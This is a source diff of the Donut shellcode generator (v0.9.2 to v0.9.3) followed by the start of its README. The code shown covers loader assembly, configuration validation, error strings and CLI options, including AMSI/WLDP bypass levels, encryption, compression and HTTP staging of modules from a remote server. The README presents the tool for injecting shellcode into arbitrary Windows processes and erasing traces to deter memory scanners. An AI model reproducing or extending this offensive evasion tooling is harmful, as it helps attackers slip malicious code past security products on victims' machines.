10131223 PUT_WORD(pl, c->inst_len);
10241234 // push edx
10251235 PUT_BYTE(pl, 0x52);
10261236
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1237 DPRINT("Copying %" PRIi32 " bytes of x86 shellcode",
1238 (uint32_t)sizeof(LOADER_EXE_X86));
10291239
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1240 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
10311241 } else
10321242 // AMD64?
10331243 if(c->arch == DONUT_ARCH_X64) {
10341244
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1245 DPRINT("Copying %" PRIi32 " bytes of amd64 shellcode",
1246 (uint32_t)sizeof(LOADER_EXE_X64));
10371247
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1248 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10391249 } else
10401250 // x86 + AMD64?
10411251 if(c->arch == DONUT_ARCH_X84) {
10421252
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1253 DPRINT("Copying %" PRIi32 " bytes of x86 + amd64 shellcode",
1254 (uint32_t)(sizeof(LOADER_EXE_X86) + sizeof(LOADER_EXE_X64)));
10451255
10461256 // xor eax, eax
10471257 PUT_BYTE(pl, 0x31);
10511261 // js dword x86_code
10521262 PUT_BYTE(pl, 0x0F);
10531263 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1264 PUT_WORD(pl, sizeof(LOADER_EXE_X64));
1265 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10561266 // pop edx
10571267 PUT_BYTE(pl, 0x5A);
10581268 // push ecx
10591269 PUT_BYTE(pl, 0x51);
10601270 // push edx
10611271 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1272 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
1273 }
1274 return DONUT_ERROR_SUCCESS;
1275 }
1276
1277 /**
1278 * Function: validate_loader_cfg
1279 * ----------------------------
1280 * Validates Donut configuration for loader.
1281 *
1282 * INPUT : Pointer to a Donut configuration.
1283 *
1284 * OUTPUT : Donut error code.
1285 */
1286 static int validate_loader_cfg(PDONUT_CONFIG c) {
1287 uint32_t url_len;
1288
1289 DPRINT("Validating loader configuration.");
1290
1291 if(c == NULL || c->input[0] == 0) {
1292 DPRINT("No configuration or input file provided.");
1293 return DONUT_ERROR_INVALID_PARAMETER;
1294 }
1295
1296 if(c->inst_type != DONUT_INSTANCE_EMBED &&
1297 c->inst_type != DONUT_INSTANCE_HTTP) {
1298
1299 DPRINT("Instance type %" PRIx32 " is invalid.", c->inst_type);
1300 return DONUT_ERROR_INVALID_PARAMETER;
1301 }
1302
1303 if(c->format < DONUT_FORMAT_BINARY || c->format > DONUT_FORMAT_HEX) {
1304 DPRINT("Format type %" PRId32 " is invalid.", c->format);
1305 return DONUT_ERROR_INVALID_FORMAT;
1306 }
1307
1308 #ifdef WINDOWS
1309 if(c->compress != DONUT_COMPRESS_NONE &&
1310 c->compress != DONUT_COMPRESS_APLIB &&
1311 c->compress != DONUT_COMPRESS_LZNT1 &&
1312 c->compress != DONUT_COMPRESS_XPRESS &&
1313 c->compress != DONUT_COMPRESS_XPRESS_HUFF)
1314 {
1315 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1316 return DONUT_ERROR_INVALID_ENGINE;
1317 }
1318 #else
1319 if(c->compress != DONUT_COMPRESS_NONE &&
1320 c->compress != DONUT_COMPRESS_APLIB)
1321 {
1322 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1323 return DONUT_ERROR_INVALID_ENGINE;
1324 }
1325 #endif
1326
1327 if(c->entropy != DONUT_ENTROPY_NONE &&
1328 c->entropy != DONUT_ENTROPY_RANDOM &&
1329 c->entropy != DONUT_ENTROPY_DEFAULT)
1330 {
1331 DPRINT("Entropy level " PRId32 " is invalid.", c->entropy);
1332 return DONUT_ERROR_INVALID_ENTROPY;
1333 }
1334
1335 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1336 // no URL? exit
1337 if(c->server[0] == 0) {
1338 DPRINT("Error: No HTTP server provided.");
1339 return DONUT_ERROR_INVALID_PARAMETER;
1340 }
1341 // doesn't begin with one of the following? exit
1342 if((strnicmp(c->server, "http://", 7) != 0) &&
1343 (strnicmp(c->server, "https://", 8) != 0)) {
1344
1345 DPRINT("URL is invalid : %s", c->server);
1346 return DONUT_ERROR_INVALID_URL;
1347 }
1348 // invalid length?
1349 url_len = (uint32_t)strlen(c->server);
1350
1351 if(url_len <= 8) {
1352 DPRINT("URL length : %" PRId32 " is invalid.", url_len);
1353 return DONUT_ERROR_URL_LENGTH;
1354 }
1355 // if the end of string doesn't have a forward slash
1356 // add one more to account for it
1357 if(c->server[url_len - 1] != '/') {
1358 c->server[url_len] = '/';
1359 url_len++;
1360 }
1361
1362 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_NAME) {
1363 DPRINT("URL length : %" PRId32 " exceeds size of buffer : %"PRId32,
1364 url_len+DONUT_MAX_MODNAME, DONUT_MAX_NAME);
1365 return DONUT_ERROR_URL_LENGTH;
1366 }
1367 }
1368
1369 if(c->arch != DONUT_ARCH_X86 &&
1370 c->arch != DONUT_ARCH_X64 &&
1371 c->arch != DONUT_ARCH_X84 &&
1372 c->arch != DONUT_ARCH_ANY)
1373 {
1374 DPRINT("Target architecture %"PRId32 " is invalid.", c->arch);
1375 return DONUT_ERROR_INVALID_ARCH;
1376 }
1377
1378 if(c->bypass != DONUT_BYPASS_NONE &&
1379 c->bypass != DONUT_BYPASS_ABORT &&
1380 c->bypass != DONUT_BYPASS_CONTINUE)
1381 {
1382 DPRINT("Option to bypass AMSI/WDLP %"PRId32" is invalid.", c->bypass);
1383 return DONUT_ERROR_BYPASS_INVALID;
1384 }
1385
1386 DPRINT("Loader configuration passed validation.");
1387 return DONUT_ERROR_SUCCESS;
1388 }
1389
1390 /**
1391 * Function: is_dll_export
1392 * ----------------------------
1393 * Validates if a DLL exports a function.
1394 *
1395 * INPUT : Name of DLL function to check.
1396 *
1397 * OUTPUT : 1 if found, else 0
1398 */
1399 static int is_dll_export(const char *function) {
1400 PIMAGE_DATA_DIRECTORY dir;
1401 PIMAGE_EXPORT_DIRECTORY exp;
1402 DWORD rva, cnt;
1403 ULONG64 ofs;
1404 PDWORD sym;
1405 PCHAR str;
1406 int found = 0;
1407
1408 DPRINT("Entering.");
1409
1410 dir = Dirs(fi.data);
1411 if(dir != NULL) {
1412 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
1413 DPRINT("EAT VA : %lx", rva);
1414 if(rva != 0) {
1415 ofs = rva2ofs(fi.data, rva);
1416 DPRINT("Offset = %" PRIX64 "\n", ofs);
1417 if(ofs != -1) {
1418 exp = (PIMAGE_EXPORT_DIRECTORY)(fi.data + ofs);
1419 cnt = exp->NumberOfNames;
1420 DPRINT("Number of exported functions : %lx", cnt);
1421
1422 if(cnt != 0) {
1423 sym = (PDWORD)(rva2ofs(fi.data, exp->AddressOfNames) + fi.data);
1424 // scan array for symbol
1425 do {
1426 str = (PCHAR)(rva2ofs(fi.data, sym[cnt - 1]) + fi.data);
1427 // if match found, exit
1428 if(strcmp(str, function) == 0) {
1429 DPRINT("Found API");
1430 found = 1;
1431 break;
1432 }
1433 } while (--cnt);
1434 }
1435 }
1436 }
1437 }
1438 DPRINT("Leaving.");
1439 return found;
1440 }
1441
1442 /**
1443 * Function: validate_file_cfg
1444 * ----------------------------
1445 * Validates configuration for the input file.
1446 *
1447 * INPUT : Pointer to Donut configuration.
1448 *
1449 * OUTPUT : Donut error code.
1450 */
1451 static int validate_file_cfg(PDONUT_CONFIG c) {
1452 DPRINT("Validating configuration for input file.");
1453
1454 // Unmanaged EXE/DLL?
1455 if(fi.type == DONUT_MODULE_DLL ||
1456 fi.type == DONUT_MODULE_EXE)
1457 {
1458 // Requested shellcode is x86, but file is x64?
1459 // Requested shellcode is x64, but file is x86?
1460 if((c->arch == DONUT_ARCH_X86 &&
1461 fi.arch == DONUT_ARCH_X64) ||
1462 (c->arch == DONUT_ARCH_X64 &&
1463 fi.arch == DONUT_ARCH_X86))
1464 {
1465 DPRINT("Target architecture %"PRId32 " is not compatible with DLL/EXE %"PRId32, c->arch, fi.arch);
1466 return DONUT_ERROR_ARCH_MISMATCH;
1467 }
1468 // DLL function specified. Does it exist?
1469 if(fi.type == DONUT_MODULE_DLL && c->method[0] != 0)
1470 {
1471 if(!is_dll_export(c->method)) {
1472 DPRINT("Unable to locate function \"%s\" in DLL", c->method);
1473 return DONUT_ERROR_DLL_FUNCTION;
1474 }
1475 }
1476 }
1477 // .NET DLL assembly?
1478 if(fi.type == DONUT_MODULE_NET_DLL) {
1479 // DLL requires class and method
1480 if(c->cls[0] == 0 || c->method[0] == 0) {
1481 DPRINT("Input file is a .NET assembly, but no class and method have been specified.");
1482 return DONUT_ERROR_NET_PARAMS;
1483 }
1484 }
1485
1486 // is this an unmanaged DLL with parameters?
1487 if(fi.type == DONUT_MODULE_DLL && c->param[0] != 0) {
1488 // we need a DLL function
1489 if(c->method[0] == 0) {
1490 DPRINT("Parameters are provided for an unmanaged/native DLL, but no function.");
1491 return DONUT_ERROR_DLL_PARAM;
1492 }
1493 }
1494 DPRINT("Validation passed.");
1495 return DONUT_ERROR_SUCCESS;
1496 }
1497
1498 /**
1499 * Function: DonutCreate
1500 * ----------------------------
1501 * Builds a position-independent loader for VBS/JS/EXE/DLL files.
1502 *
1503 * INPUT : Pointer to a Donut configuration.
1504 *
1505 * OUTPUT : Donut error code.
1506 */
1507 EXPORT_FUNC
1508 int DonutCreate(PDONUT_CONFIG c) {
1509 int err = DONUT_ERROR_SUCCESS;
1510
1511 DPRINT("Entering.");
1512
1513 c->mod = c->pic = c->inst = NULL;
1514 c->mod_len = c->pic_len = c->inst_len = 0;
1515
1516 // 1. validate the loader configuration
1517 err = validate_loader_cfg(c);
1518 if(err == DONUT_ERROR_SUCCESS) {
1519 // 2. get information about the file to execute in memory
1520 err = read_file_info(c);
1521 if(err == DONUT_ERROR_SUCCESS) {
1522 // 3. validate the module configuration
1523 err = validate_file_cfg(c);
1524 if(err == DONUT_ERROR_SUCCESS) {
1525 // 4. build the module
1526 err = build_module(c);
1527 if(err == DONUT_ERROR_SUCCESS) {
1528 // 5. build the instance
1529 err = build_instance(c);
1530 if(err == DONUT_ERROR_SUCCESS) {
1531 // 6. build the loader
1532 err = build_loader(c);
1533 if(err == DONUT_ERROR_SUCCESS) {
1534 // 7. save loader and any additional files to disk
1535 err = save_loader(c);
1536 }
1537 }
1538 }
1539 }
1540 }
1541 }
10651542 // if there was some error, release resources
10661543 if(err != DONUT_ERROR_SUCCESS) {
10671544 DonutDelete(c);
10681545 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1546 DPRINT("Leaving with error : %" PRId32, err);
10711547 return err;
10721548 }
10731549
1074 // release resources allocated for configuration
1550 /**
1551 * Function: DonutDelete
1552 * ----------------------------
1553 * Releases memory allocated by internal Donut functions.
1554 *
1555 * INPUT : Pointer to a Donut configuration previously used by DonutCreate.
1556 *
1557 * OUTPUT : Donut error code.
1558 */
10751559 EXPORT_FUNC
10761560 int DonutDelete(PDONUT_CONFIG c) {
10771561
10811565 }
10821566 // free module
10831567 if(c->mod != NULL) {
1568 DPRINT("Releasing memory for module.");
10841569 free(c->mod);
10851570 c->mod = NULL;
10861571 }
10871572 // free instance
10881573 if(c->inst != NULL) {
1574 DPRINT("Releasing memory for configuration.");
10891575 free(c->inst);
10901576 c->inst = NULL;
10911577 }
1092 // free payload
1578 // free loader
10931579 if(c->pic != NULL) {
1580 DPRINT("Releasing memory for loader.");
10941581 free(c->pic);
10951582 c->pic = NULL;
10961583 }
1584 unmap_file();
1585
10971586 DPRINT("Leaving.");
10981587 return DONUT_ERROR_SUCCESS;
10991588 }
11001589
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1590 /**
1591 * Function: DonutError
1592 * ----------------------------
1593 * Converts Donut error code into a string
1594 *
1595 * INPUT : error code returned by DonutCreate
1596 *
1597 * OUTPUT : error code as a string
1598 */
1599 EXPORT_FUNC
1600 const char *DonutError(int err) {
11051601 static const char *str="N/A";
11061602
11071603 switch(err) {
11081604 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1605 str = "No error.";
11101606 break;
11111607 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1608 str = "File not found.";
11131609 break;
11141610 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1611 str = "File is empty.";
11161612 break;
11171613 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1614 str = "Cannot open file.";
11191615 break;
11201616 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1617 str = "File is invalid.";
11221618 break;
11231619 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1620 str = "File is a .NET DLL. Donut requires a class and method.";
11251621 break;
11261622 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1623 str = "Memory allocation failed.";
11281624 break;
11291625 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1626 str = "Invalid architecture specified.";
11311627 break;
11321628 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1629 str = "Invalid URL.";
11341630 break;
11351631 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1632 str = "Invalid URL length.";
11371633 break;
11381634 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1635 str = "Invalid parameter.";
11401636 break;
11411637 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1638 str = "Error generating random values.";
11431639 break;
11441640 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1641 str = "Unable to locate DLL function provided. Names are case sensitive.";
11461642 break;
11471643 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1644 str = "Target architecture cannot support selected DLL/EXE file.";
11491645 break;
11501646 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1647 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.";
11521648 break;
11531649 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1650 str = "Invalid bypass option specified.";
1651 break;
1652 case DONUT_ERROR_NORELOC:
1653 str = "This file has no relocation information required for in-memory execution.";
1654 break;
1655 case DONUT_ERROR_INVALID_FORMAT:
1656 str = "The output format is invalid.";
1657 break;
1658 case DONUT_ERROR_INVALID_ENGINE:
1659 str = "The compression engine is invalid.";
1660 break;
1661 case DONUT_ERROR_COMPRESSION:
1662 str = "There was an error during compression.";
1663 break;
1664 case DONUT_ERROR_INVALID_ENTROPY:
1665 str = "Invalid entropy level specified.";
1666 break;
1667 }
1668 DPRINT("Error result : %s", str);
11571669 return str;
11581670 }
11591671
1672 #ifdef DONUT_EXE
11601673 static char* get_param (int argc, char *argv[], int *i) {
11611674 int n = *i;
11621675 if (argv[n][2] != 0) {
11701683 exit (0);
11711684 }
11721685
1686
11731687 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
1688 printf(" usage: donut [options] <EXE/DLL/VBS/JS>\n\n");
1689 printf(" Only the finest artisanal donuts are made of shells.\n\n");
11761690 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
1691 printf(" -n <name> Module name for HTTP staging. If entropy is enabled, this is generated randomly.\n");
1692 printf(" -s <server> HTTP server that will host the donut module.\n");
1693 printf(" -e <level> Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)\n\n");
1694
11801695 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1696 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).\n");
1697 printf(" -b <level> Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)\n");
1698 printf(" -o <path> Output file to save loader. Default is \"loader.bin\"\n");
1699 printf(" -f <format> Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex\n");
1700 printf(" -y <addr> Create thread for loader and continue execution at <addr> supplied.\n");
1701 printf(" -x <action> Exiting. 1=Exit thread (default), 2=Exit process\n\n");
1702
1703 printf(" -FILE OPTIONS-\n\n");
1704 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1705 printf(" -d <name> AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.\n");
1706 printf(" -m <method | api> Optional method or function for DLL. (a method is required for .NET DLL)\n");
1707 printf(" -p <arguments> Optional parameters/command line inside quotations for DLL method/function or EXE.\n");
1708 printf(" -w Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)\n");
11891709 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1710 printf(" -t Execute the entrypoint of an unmanaged EXE as a thread.\n");
1711 #ifdef WINDOWS
1712 printf(" -z <engine> Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman\n\n");
1713 #else
1714 printf(" -z <engine> Pack/Compress file. 1=None, 2=aPLib\n\n");
1715 #endif
11911716
11921717 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
1718 printf(" donut c2.dll\n");
1719 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll\n");
1720 printf(" donut loader.dll -c TestClass -m RunProcess -p\"calc notepad\" -s http://remote_server.com/modules/\n");
11961721
11971722 exit (0);
11981723 }
12011726 DONUT_CONFIG c;
12021727 char opt;
12031728 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
1729 char *mod_type;
1730 char *arch_str[3] = { "x86", "amd64", "x86+amd64" };
1731 char *inst_type[2]= { "Embedded", "HTTP" };
12081732
12091733 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1734 printf(" [ Donut shellcode generator v0.9.3\n");
12111735 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
12121736
12131737 // zero initialize configuration
12141738 memset(&c, 0, sizeof(c));
12151739
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
1740 // default settings
1741 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
1742 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
12191743 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1744 c.format = DONUT_FORMAT_BINARY; // default output format
1745 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
1746 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
1747 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
1748 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
12201749
12211750 // parse arguments
12221751 for(i=1; i<argc; i++) {
12231752 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1753 if(argv[i][0] == '-') {
1754 opt = argv[i][1];
1755
1756 switch(opt) {
1757 // target cpu architecture
1758 case 'a': {
1759 c.arch = atoi(get_param(argc, argv, &i));
1760 break;
1761 }
1762 // bypass options
1763 case 'b': {
1764 c.bypass = atoi(get_param(argc, argv, &i));
1765 break;
1766 }
1767 // class of .NET assembly
1768 case 'c': {
1769 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1770 break;
1771 }
1772 // name of domain to use for .NET assembly
1773 case 'd': {
1774 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1775 break;
1776 }
1777 // encryption options
1778 case 'e': {
1779 c.entropy = atoi(get_param(argc, argv, &i));
1780 break;
1781 }
1782 // output format
1783 case 'f': {
1784 c.format = atoi(get_param(argc, argv, &i));
1785 break;
1786 }
1787 // method of .NET assembly
1788 case 'm': {
1789 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1790 break;
1791 }
1792 // module name
1793 case 'n': {
1794 strncpy(c.modname, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1795 break;
1796 }
1797 // output file for loader
1798 case 'o': {
1799 strncpy(c.output, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1800 break;
1801 }
1802 // parameters to method, DLL function or command line for unmanaged EXE
1803 case 'p': {
1804 strncpy(c.param, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1805 break;
1806 }
1807 // runtime version to use for .NET DLL / EXE
1808 case 'r': {
1809 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1810 break;
1811 }
1812 // run entrypoint of unmanaged EXE as a thread
1813 case 't': {
1814 c.thread = 1;
1815 break;
1816 }
1817 // server
1818 case 's': {
1819 strncpy(c.server, get_param(argc, argv, &i), DONUT_MAX_NAME - 2);
1820 c.inst_type = DONUT_INSTANCE_HTTP;
1821 break;
1822 }
1823 // convert param to unicode? only applies to unmanaged DLL function
1824 case 'w': {
1825 c.unicode = 1;
1826 break;
1827 }
1828 // call RtlExitUserProcess to terminate host process
1829 case 'x': {
1830 c.exit_opt = atoi(get_param(argc, argv, &i));
1831 break;
1832 }
1833 // fork a new thread and execute address of original entry point
1834 case 'y': {
1835 c.oep = strtoull(get_param(argc, argv, &i), NULL, 16);
1836 break;
1837 }
1838 // pack/compress input file
1839 case 'z': {
1840 c.compress = atoi(get_param(argc, argv, &i));
1841 break;
1842 }
1843 // for anything else, display usage
1844 default: {
1845 usage();
1846 break;
1847 }
12551848 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1849 } else {
1850 // assume it's an EXE/DLL/VBS/JS file to embed in shellcode
1851 strncpy(c.input, argv[i], DONUT_MAX_NAME - 1);
12751852 }
12761853 }
12771854
12781855 // no file? show usage and exit
1279 if(c.file[0] == 0) {
1856 if(c.input[0] == 0) {
12801857 usage();
12811858 }
12821859
1283 // generate payload from configuration
1860 // generate loader from configuration
12841861 err = DonutCreate(&c);
1285
1862
12861863 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
1864 printf(" [ Error : %s\n", DonutError(err));
12881865 return 0;
12891866 }
12901867
13071884 case DONUT_MODULE_JS:
13081885 mod_type = "JScript";
13091886 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
13131887 default:
13141888 mod_type = "Unrecognized";
13151889 break;
13161890 }
1891
13171892 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
1893 printf(" [ Module file : \"%s\"\n", c.input);
1894 printf(" [ Entropy : %s\n",
1895 c.entropy == DONUT_ENTROPY_NONE ? "None" :
1896 c.entropy == DONUT_ENTROPY_RANDOM ? "Random Names" : "Random names + Encryption");
1897
1898 if(c.compress != DONUT_COMPRESS_NONE) {
1899 printf(" [ Compressed : %s (Reduced by %"PRId32"%%)\n",
1900 c.compress == DONUT_COMPRESS_APLIB ? "aPLib" :
1901 c.compress == DONUT_COMPRESS_LZNT1 ? "LZNT1" :
1902 c.compress == DONUT_COMPRESS_XPRESS ? "Xpress" : "Xpress Huffman",
1903 file_diff(c.zlen, c.len));
1904 }
1905
13191906 printf(" [ File type : %s\n", mod_type);
13201907
13211908 // if this is a .NET DLL, display the class and method
13331920 }
13341921 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
13351922
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
1923 if(c.inst_type == DONUT_INSTANCE_HTTP) {
13371924 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
1925 printf(" [ Upload to : %s\n", c.server);
13391926 }
13401927
13411928 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1929 c.bypass == DONUT_BYPASS_NONE ? "none" :
13431930 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
13441931
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
1932 printf(" [ Shellcode : \"%s\"\n", c.output);
1933 if(c.oep != 0) {
1934 printf(" [ OEP : 0x%"PRIX64"\n", c.oep);
1935 }
1936
13551937 DonutDelete(&c);
13561938 return 0;
13571939 }
+0
-264
donut_shellcode.egg-info/PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
